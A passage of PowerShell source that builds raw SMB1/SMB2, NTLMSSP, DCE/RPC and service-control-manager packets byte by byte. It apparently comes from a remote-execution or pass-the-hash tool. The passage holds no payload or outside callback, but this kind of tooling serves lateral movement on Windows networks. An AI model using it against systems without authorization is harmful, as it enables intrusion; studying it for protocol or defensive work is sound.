$packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_Offset",[Byte[]](0xea,0x03,0x00,0x00)) $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_Reserved2",[Byte[]](0xff,0xff,0xff,0xff)) $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_WriteMode",[Byte[]](0x08,0x00)) $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_Remaining",$packet_write_length) $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_DataLengthHigh",[Byte[]](0x00,0x00)) $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_DataLengthLow",$packet_write_length) $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_DataOffset",[Byte[]](0x3f,0x00)) $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_HighOffset",[Byte[]](0x00,0x00,0x00,0x00)) $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_ByteCount",$packet_write_length) return $packet_SMBWriteAndXRequest } function Get-PacketSMBCloseRequest() { param ([Byte[]]$packet_file_ID) $packet_SMBCloseRequest = New-Object System.Collections.Specialized.OrderedDictionary $packet_SMBCloseRequest.Add("SMBCloseRequest_WordCount",[Byte[]](0x03)) $packet_SMBCloseRequest.Add("SMBCloseRequest_FID",$packet_file_ID) $packet_SMBCloseRequest.Add("SMBCloseRequest_LastWrite",[Byte[]](0xff,0xff,0xff,0xff)) $packet_SMBCloseRequest.Add("SMBCloseRequest_ByteCount",[Byte[]](0x00,0x00)) return $packet_SMBCloseRequest } function Get-PacketSMBTreeDisconnectRequest() { $packet_SMBTreeDisconnectRequest = New-Object System.Collections.Specialized.OrderedDictionary $packet_SMBTreeDisconnectRequest.Add("SMBTreeDisconnectRequest_WordCount",[Byte[]](0x00)) $packet_SMBTreeDisconnectRequest.Add("SMBTreeDisconnectRequest_ByteCount",[Byte[]](0x00,0x00)) return $packet_SMBTreeDisconnectRequest } function Get-PacketSMBLogoffAndXRequest() { $packet_SMBLogoffAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary $packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_WordCount",[Byte[]](0x02)) $packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_AndXCommand",[Byte[]](0xff)) $packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_Reserved",[Byte[]](0x00)) $packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_AndXOffset",[Byte[]](0x00,0x00)) $packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_ByteCount",[Byte[]](0x00,0x00)) return $packet_SMBLogoffAndXRequest } #SMB2 function Get-PacketSMB2Header() { param([Byte[]]$packet_command,[Int]$packet_message_ID,[Byte[]]$packet_tree_ID,[Byte[]]$packet_session_ID) [Byte[]]$packet_message_ID = [System.BitConverter]::GetBytes($packet_message_ID) + 0x00,0x00,0x00,0x00 $packet_SMB2Header = New-Object System.Collections.Specialized.OrderedDictionary $packet_SMB2Header.Add("SMB2Header_ProtocolID",[Byte[]](0xfe,0x53,0x4d,0x42)) $packet_SMB2Header.Add("SMB2Header_StructureSize",[Byte[]](0x40,0x00)) $packet_SMB2Header.Add("SMB2Header_CreditCharge",[Byte[]](0x01,0x00)) $packet_SMB2Header.Add("SMB2Header_ChannelSequence",[Byte[]](0x00,0x00)) $packet_SMB2Header.Add("SMB2Header_Reserved",[Byte[]](0x00,0x00)) $packet_SMB2Header.Add("SMB2Header_Command",$packet_command) $packet_SMB2Header.Add("SMB2Header_CreditRequest",[Byte[]](0x00,0x00)) $packet_SMB2Header.Add("SMB2Header_Flags",[Byte[]](0x00,0x00,0x00,0x00)) $packet_SMB2Header.Add("SMB2Header_NextCommand",[Byte[]](0x00,0x00,0x00,0x00)) $packet_SMB2Header.Add("SMB2Header_MessageID",$packet_message_ID) $packet_SMB2Header.Add("SMB2Header_Reserved2",[Byte[]](0x00,0x00,0x00,0x00)) $packet_SMB2Header.Add("SMB2Header_TreeID",$packet_tree_ID) $packet_SMB2Header.Add("SMB2Header_SessionID",$packet_session_ID) $packet_SMB2Header.Add("SMB2Header_Signature",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) return $packet_SMB2Header } function Get-PacketSMB2NegotiateProtocolRequest() { $packet_SMB2NegotiateProtocolRequest = New-Object System.Collections.Specialized.OrderedDictionary $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_StructureSize",[Byte[]](0x24,0x00)) $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_DialectCount",[Byte[]](0x02,0x00)) $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_SecurityMode",[Byte[]](0x01,0x00)) $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Reserved",[Byte[]](0x00,0x00)) $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Capabilities",[Byte[]](0x40,0x00,0x00,0x00)) $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_ClientGUID",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_NegotiateContextOffset",[Byte[]](0x00,0x00,0x00,0x00)) $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_NegotiateContextCount",[Byte[]](0x00,0x00)) $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Reserved2",[Byte[]](0x00,0x00)) $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Dialect",[Byte[]](0x02,0x02)) $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Dialect2",[Byte[]](0x10,0x02)) return $packet_SMB2NegotiateProtocolRequest } function Get-PacketSMB2SessionSetupRequest() { param([Byte[]]$packet_security_blob) [Byte[]]$packet_security_blob_length = [System.BitConverter]::GetBytes($packet_security_blob.Length) $packet_security_blob_length = $packet_security_blob_length[0,1] $packet_SMB2SessionSetupRequest = New-Object System.Collections.Specialized.OrderedDictionary $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_StructureSize",[Byte[]](0x19,0x00)) $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_Flags",[Byte[]](0x00)) $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_SecurityMode",[Byte[]](0x01)) $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_Capabilities",[Byte[]](0x00,0x00,0x00,0x00)) $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_Channel",[Byte[]](0x00,0x00,0x00,0x00)) $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_SecurityBufferOffset",[Byte[]](0x58,0x00)) $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_SecurityBufferLength",$packet_security_blob_length) $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_PreviousSessionID",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_Buffer",$packet_security_blob) return $packet_SMB2SessionSetupRequest } function Get-PacketSMB2TreeConnectRequest() { param([Byte[]]$packet_path) [Byte[]]$packet_path_length = [System.BitConverter]::GetBytes($packet_path.Length) $packet_path_length = $packet_path_length[0,1] $packet_SMB2TreeConnectRequest = New-Object System.Collections.Specialized.OrderedDictionary $packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_StructureSize",[Byte[]](0x09,0x00)) $packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_Reserved",[Byte[]](0x00,0x00)) $packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_PathOffset",[Byte[]](0x48,0x00)) $packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_PathLength",$packet_path_length) $packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_Buffer",$packet_path) return $packet_SMB2TreeConnectRequest } function Get-PacketSMB2CreateRequestFile() { param([Byte[]]$packet_named_pipe) $packet_named_pipe_length = [System.BitConverter]::GetBytes($packet_named_pipe.Length) $packet_named_pipe_length = $packet_named_pipe_length[0,1] $packet_SMB2CreateRequestFile = New-Object System.Collections.Specialized.OrderedDictionary $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_StructureSize",[Byte[]](0x39,0x00)) $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_Flags",[Byte[]](0x00)) $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_RequestedOplockLevel",[Byte[]](0x00)) $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_Impersonation",[Byte[]](0x02,0x00,0x00,0x00)) $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_SMBCreateFlags",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_Reserved",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_DesiredAccess",[Byte[]](0x03,0x00,0x00,0x00)) $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_FileAttributes",[Byte[]](0x80,0x00,0x00,0x00)) $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_ShareAccess",[Byte[]](0x01,0x00,0x00,0x00)) $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_CreateDisposition",[Byte[]](0x01,0x00,0x00,0x00)) $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_CreateOptions",[Byte[]](0x40,0x00,0x00,0x00)) $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_NameOffset",[Byte[]](0x78,0x00)) $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_NameLength",$packet_named_pipe_length) $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_CreateContextsOffset",[Byte[]](0x00,0x00,0x00,0x00)) $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_CreateContextsLength",[Byte[]](0x00,0x00,0x00,0x00)) $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_Buffer",$packet_named_pipe) return $packet_SMB2CreateRequestFile } function Get-PacketSMB2ReadRequest() { param ([Byte[]]$packet_file_ID) $packet_SMB2ReadRequest = New-Object System.Collections.Specialized.OrderedDictionary $packet_SMB2ReadRequest.Add("SMB2ReadRequest_StructureSize",[Byte[]](0x31,0x00)) $packet_SMB2ReadRequest.Add("SMB2ReadRequest_Padding",[Byte[]](0x50)) $packet_SMB2ReadRequest.Add("SMB2ReadRequest_Flags",[Byte[]](0x00)) $packet_SMB2ReadRequest.Add("SMB2ReadRequest_Length",[Byte[]](0x00,0x00,0x10,0x00)) $packet_SMB2ReadRequest.Add("SMB2ReadRequest_Offset",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_SMB2ReadRequest.Add("SMB2ReadRequest_FileID",$packet_file_ID) $packet_SMB2ReadRequest.Add("SMB2ReadRequest_MinimumCount",[Byte[]](0x00,0x00,0x00,0x00)) $packet_SMB2ReadRequest.Add("SMB2ReadRequest_Channel",[Byte[]](0x00,0x00,0x00,0x00)) $packet_SMB2ReadRequest.Add("SMB2ReadRequest_RemainingBytes",[Byte[]](0x00,0x00,0x00,0x00)) $packet_SMB2ReadRequest.Add("SMB2ReadRequest_ReadChannelInfoOffset",[Byte[]](0x00,0x00)) $packet_SMB2ReadRequest.Add("SMB2ReadRequest_ReadChannelInfoLength",[Byte[]](0x00,0x00)) $packet_SMB2ReadRequest.Add("SMB2ReadRequest_Buffer",[Byte[]](0x30)) return $packet_SMB2ReadRequest } function Get-PacketSMB2WriteRequest() { param([Byte[]]$packet_file_ID,[Int]$packet_RPC_length) [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_RPC_length) $packet_SMB2WriteRequest = New-Object System.Collections.Specialized.OrderedDictionary $packet_SMB2WriteRequest.Add("SMB2WriteRequest_StructureSize",[Byte[]](0x31,0x00)) $packet_SMB2WriteRequest.Add("SMB2WriteRequest_DataOffset",[Byte[]](0x70,0x00)) $packet_SMB2WriteRequest.Add("SMB2WriteRequest_Length",$packet_write_length) $packet_SMB2WriteRequest.Add("SMB2WriteRequest_Offset",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_SMB2WriteRequest.Add("SMB2WriteRequest_FileID",$packet_file_ID) $packet_SMB2WriteRequest.Add("SMB2WriteRequest_Channel",[Byte[]](0x00,0x00,0x00,0x00)) $packet_SMB2WriteRequest.Add("SMB2WriteRequest_RemainingBytes",[Byte[]](0x00,0x00,0x00,0x00)) $packet_SMB2WriteRequest.Add("SMB2WriteRequest_WriteChannelInfoOffset",[Byte[]](0x00,0x00)) $packet_SMB2WriteRequest.Add("SMB2WriteRequest_WriteChannelInfoLength",[Byte[]](0x00,0x00)) $packet_SMB2WriteRequest.Add("SMB2WriteRequest_Flags",[Byte[]](0x00,0x00,0x00,0x00)) return $packet_SMB2WriteRequest } function Get-PacketSMB2CloseRequest() { param ([Byte[]]$packet_file_ID) $packet_SMB2CloseRequest = New-Object System.Collections.Specialized.OrderedDictionary $packet_SMB2CloseRequest.Add("SMB2CloseRequest_StructureSize",[Byte[]](0x18,0x00)) $packet_SMB2CloseRequest.Add("SMB2CloseRequest_Flags",[Byte[]](0x00,0x00)) $packet_SMB2CloseRequest.Add("SMB2CloseRequest_Reserved",[Byte[]](0x00,0x00,0x00,0x00)) $packet_SMB2CloseRequest.Add("SMB2CloseRequest_FileID",$packet_file_ID) return $packet_SMB2CloseRequest } function Get-PacketSMB2TreeDisconnectRequest() { $packet_SMB2TreeDisconnectRequest = New-Object System.Collections.Specialized.OrderedDictionary $packet_SMB2TreeDisconnectRequest.Add("SMB2TreeDisconnectRequest_StructureSize",[Byte[]](0x04,0x00)) $packet_SMB2TreeDisconnectRequest.Add("SMB2TreeDisconnectRequest_Reserved",[Byte[]](0x00,0x00)) return $packet_SMB2TreeDisconnectRequest } function Get-PacketSMB2SessionLogoffRequest() { $packet_SMB2SessionLogoffRequest = New-Object System.Collections.Specialized.OrderedDictionary $packet_SMB2SessionLogoffRequest.Add("SMB2SessionLogoffRequest_StructureSize",[Byte[]](0x04,0x00)) $packet_SMB2SessionLogoffRequest.Add("SMB2SessionLogoffRequest_Reserved",[Byte[]](0x00,0x00)) return $packet_SMB2SessionLogoffRequest } #NTLM function Get-PacketNTLMSSPNegotiate() { param([Byte[]]$packet_negotiate_flags,[Byte[]]$packet_version) [Byte[]]$packet_NTLMSSP_length = [System.BitConverter]::GetBytes(32 + $packet_version.Length) $packet_NTLMSSP_length = $packet_NTLMSSP_length[0] [Byte[]]$packet_ASN_length_1 = $packet_NTLMSSP_length[0] + 32 [Byte[]]$packet_ASN_length_2 = $packet_NTLMSSP_length[0] + 22 [Byte[]]$packet_ASN_length_3 = $packet_NTLMSSP_length[0] + 20 [Byte[]]$packet_ASN_length_4 = $packet_NTLMSSP_length[0] + 2 $packet_NTLMSSPNegotiate = New-Object System.Collections.Specialized.OrderedDictionary $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InitialContextTokenID",[Byte[]](0x60)) # the ASN.1 key names are likely not all correct $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InitialcontextTokenLength",$packet_ASN_length_1) $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_ThisMechID",[Byte[]](0x06)) $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_ThisMechLength",[Byte[]](0x06)) $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_OID",[Byte[]](0x2b,0x06,0x01,0x05,0x05,0x02)) $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InnerContextTokenID",[Byte[]](0xa0)) $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InnerContextTokenLength",$packet_ASN_length_2) $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InnerContextTokenID2",[Byte[]](0x30)) $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InnerContextTokenLength2",$packet_ASN_length_3) $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesID",[Byte[]](0xa0)) $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesLength",[Byte[]](0x0e)) $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesID2",[Byte[]](0x30)) $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesLength2",[Byte[]](0x0c)) $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesID3",[Byte[]](0x06)) $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesLength3",[Byte[]](0x0a)) $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechType",[Byte[]](0x2b,0x06,0x01,0x04,0x01,0x82,0x37,0x02,0x02,0x0a)) $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTokenID",[Byte[]](0xa2)) $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTokenLength",$packet_ASN_length_4) $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_NTLMSSPID",[Byte[]](0x04)) $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_NTLMSSPLength",$packet_NTLMSSP_length) $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00)) $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MessageType",[Byte[]](0x01,0x00,0x00,0x00)) $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_NegotiateFlags",$packet_negotiate_flags) $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) if($packet_version) { $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_Version",$packet_version) } return $packet_NTLMSSPNegotiate } function Get-PacketNTLMSSPAuth() { param([Byte[]]$packet_NTLM_response) [Byte[]]$packet_NTLMSSP_length = [System.BitConverter]::GetBytes($packet_NTLM_response.Length) $packet_NTLMSSP_length = $packet_NTLMSSP_length[1,0] [Byte[]]$packet_ASN_length_1 = [System.BitConverter]::GetBytes($packet_NTLM_response.Length + 12) $packet_ASN_length_1 = $packet_ASN_length_1[1,0] [Byte[]]$packet_ASN_length_2 = [System.BitConverter]::GetBytes($packet_NTLM_response.Length + 8) $packet_ASN_length_2 = $packet_ASN_length_2[1,0] [Byte[]]$packet_ASN_length_3 = [System.BitConverter]::GetBytes($packet_NTLM_response.Length + 4) $packet_ASN_length_3 = $packet_ASN_length_3[1,0] $packet_NTLMSSPAuth = New-Object System.Collections.Specialized.OrderedDictionary $packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNID",[Byte[]](0xa1,0x82)) $packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNLength",$packet_ASN_length_1) $packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNID2",[Byte[]](0x30,0x82)) $packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNLength2",$packet_ASN_length_2) $packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNID3",[Byte[]](0xa2,0x82)) $packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNLength3",$packet_ASN_length_3) $packet_NTLMSSPAuth.Add("NTLMSSPAuth_NTLMSSPID",[Byte[]](0x04,0x82)) $packet_NTLMSSPAuth.Add("NTLMSSPAuth_NTLMSSPLength",$packet_NTLMSSP_length) $packet_NTLMSSPAuth.Add("NTLMSSPAuth_NTLMResponse",$packet_NTLM_response) return $packet_NTLMSSPAuth } #RPC function Get-PacketRPCBind() { param([Int]$packet_call_ID,[Byte[]]$packet_max_frag,[Byte[]]$packet_num_ctx_items,[Byte[]]$packet_context_ID,[Byte[]]$packet_UUID,[Byte[]]$packet_UUID_version) [Byte[]]$packet_call_ID_bytes = [System.BitConverter]::GetBytes($packet_call_ID) $packet_RPCBind = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCBind.Add("RPCBind_Version",[Byte[]](0x05)) $packet_RPCBind.Add("RPCBind_VersionMinor",[Byte[]](0x00)) $packet_RPCBind.Add("RPCBind_PacketType",[Byte[]](0x0b)) $packet_RPCBind.Add("RPCBind_PacketFlags",[Byte[]](0x03)) $packet_RPCBind.Add("RPCBind_DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCBind.Add("RPCBind_FragLength",[Byte[]](0x48,0x00)) $packet_RPCBind.Add("RPCBind_AuthLength",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("RPCBind_CallID",$packet_call_ID_bytes) $packet_RPCBind.Add("RPCBind_MaxXmitFrag",[Byte[]](0xb8,0x10)) $packet_RPCBind.Add("RPCBind_MaxRecvFrag",[Byte[]](0xb8,0x10)) $packet_RPCBind.Add("RPCBind_AssocGroup",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("RPCBind_NumCtxItems",$packet_num_ctx_items) $packet_RPCBind.Add("RPCBind_Unknown",[Byte[]](0x00,0x00,0x00)) $packet_RPCBind.Add("RPCBind_ContextID",$packet_context_ID) $packet_RPCBind.Add("RPCBind_NumTransItems",[Byte[]](0x01)) $packet_RPCBind.Add("RPCBind_Unknown2",[Byte[]](0x00)) $packet_RPCBind.Add("RPCBind_Interface",$packet_UUID) $packet_RPCBind.Add("RPCBind_InterfaceVer",$packet_UUID_version) $packet_RPCBind.Add("RPCBind_InterfaceVerMinor",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("RPCBind_TransferSyntax",[Byte[]](0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60)) $packet_RPCBind.Add("RPCBind_TransferSyntaxVer",[Byte[]](0x02,0x00,0x00,0x00)) if($packet_num_ctx_items[0] -eq 2) { $packet_RPCBind.Add("RPCBind_ContextID2",[Byte[]](0x01,0x00)) $packet_RPCBind.Add("RPCBind_NumTransItems2",[Byte[]](0x01)) $packet_RPCBind.Add("RPCBind_Unknown3",[Byte[]](0x00)) $packet_RPCBind.Add("RPCBind_Interface2",[Byte[]](0xc4,0xfe,0xfc,0x99,0x60,0x52,0x1b,0x10,0xbb,0xcb,0x00,0xaa,0x00,0x21,0x34,0x7a)) $packet_RPCBind.Add("RPCBind_InterfaceVer2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("RPCBind_InterfaceVerMinor2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("RPCBind_TransferSyntax2",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("RPCBind_TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00)) } elseif($packet_num_ctx_items[0] -eq 3) { $packet_RPCBind.Add("RPCBind_ContextID2",[Byte[]](0x01,0x00)) $packet_RPCBind.Add("RPCBind_NumTransItems2",[Byte[]](0x01)) $packet_RPCBind.Add("RPCBind_Unknown3",[Byte[]](0x00)) $packet_RPCBind.Add("RPCBind_Interface2",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) $packet_RPCBind.Add("RPCBind_InterfaceVer2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("RPCBind_InterfaceVerMinor2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("RPCBind_TransferSyntax2",[Byte[]](0x33,0x05,0x71,0x71,0xba,0xbe,0x37,0x49,0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36)) $packet_RPCBind.Add("RPCBind_TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("RPCBind_ContextID3",[Byte[]](0x02,0x00)) $packet_RPCBind.Add("RPCBind_NumTransItems3",[Byte[]](0x01)) $packet_RPCBind.Add("RPCBind_Unknown4",[Byte[]](0x00)) $packet_RPCBind.Add("RPCBind_Interface3",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) $packet_RPCBind.Add("RPCBind_InterfaceVer3",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("RPCBind_InterfaceVerMinor3",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("RPCBind_TransferSyntax3",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("RPCBind_TransferSyntaxVer3",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("RPCBind_AuthType",[Byte[]](0x0a)) $packet_RPCBind.Add("RPCBind_AuthLevel",[Byte[]](0x04)) $packet_RPCBind.Add("RPCBind_AuthPadLength",[Byte[]](0x00)) $packet_RPCBind.Add("RPCBind_AuthReserved",[Byte[]](0x00)) $packet_RPCBind.Add("RPCBind_ContextID4",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("RPCBind_Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00)) $packet_RPCBind.Add("RPCBind_MessageType",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("RPCBind_NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2)) $packet_RPCBind.Add("RPCBind_CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("RPCBind_CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("RPCBind_OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f)) } if($packet_call_ID -eq 3) { $packet_RPCBind.Add("RPCBind_AuthType",[Byte[]](0x0a)) $packet_RPCBind.Add("RPCBind_AuthLevel",[Byte[]](0x02)) $packet_RPCBind.Add("RPCBind_AuthPadLength",[Byte[]](0x00)) $packet_RPCBind.Add("RPCBind_AuthReserved",[Byte[]](0x00)) $packet_RPCBind.Add("RPCBind_ContextID3",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("RPCBind_Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00)) $packet_RPCBind.Add("RPCBind_MessageType",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("RPCBind_NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2)) $packet_RPCBind.Add("RPCBind_CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("RPCBind_CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("RPCBind_OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f)) } return $packet_RPCBind } function Get-PacketRPCRequest() { param([Byte[]]$packet_flags,[Int]$packet_service_length,[Int]$packet_auth_length,[Int]$packet_auth_padding,[Byte[]]$packet_call_ID,[Byte[]]$packet_context_ID,[Byte[]]$packet_opnum,[Byte[]]$packet_data) if($packet_auth_length -gt 0) { $packet_full_auth_length = $packet_auth_length + $packet_auth_padding + 8 } [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_service_length + 24 + $packet_full_auth_length + $packet_data.Length) [Byte[]]$packet_frag_length = $packet_write_length[0,1] [Byte[]]$packet_alloc_hint = [System.BitConverter]::GetBytes($packet_service_length + $packet_data.Length) [Byte[]]$packet_auth_length = [System.BitConverter]::GetBytes($packet_auth_length) $packet_auth_length = $packet_auth_length[0,1] $packet_RPCRequest = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCRequest.Add("RPCRequest_Version",[Byte[]](0x05)) $packet_RPCRequest.Add("RPCRequest_VersionMinor",[Byte[]](0x00)) $packet_RPCRequest.Add("RPCRequest_PacketType",[Byte[]](0x00)) $packet_RPCRequest.Add("RPCRequest_PacketFlags",$packet_flags) $packet_RPCRequest.Add("RPCRequest_DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCRequest.Add("RPCRequest_FragLength",$packet_frag_length) $packet_RPCRequest.Add("RPCRequest_AuthLength",$packet_auth_length) $packet_RPCRequest.Add("RPCRequest_CallID",$packet_call_ID) $packet_RPCRequest.Add("RPCRequest_AllocHint",$packet_alloc_hint) $packet_RPCRequest.Add("RPCRequest_ContextID",$packet_context_ID) $packet_RPCRequest.Add("RPCRequest_Opnum",$packet_opnum) if($packet_data.Length) { $packet_RPCRequest.Add("RPCRequest_Data",$packet_data) } return $packet_RPCRequest } #SCM function Get-PacketSCMOpenSCManagerW() { param ([Byte[]]$packet_service,[Byte[]]$packet_service_length) [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_service.Length + 92) 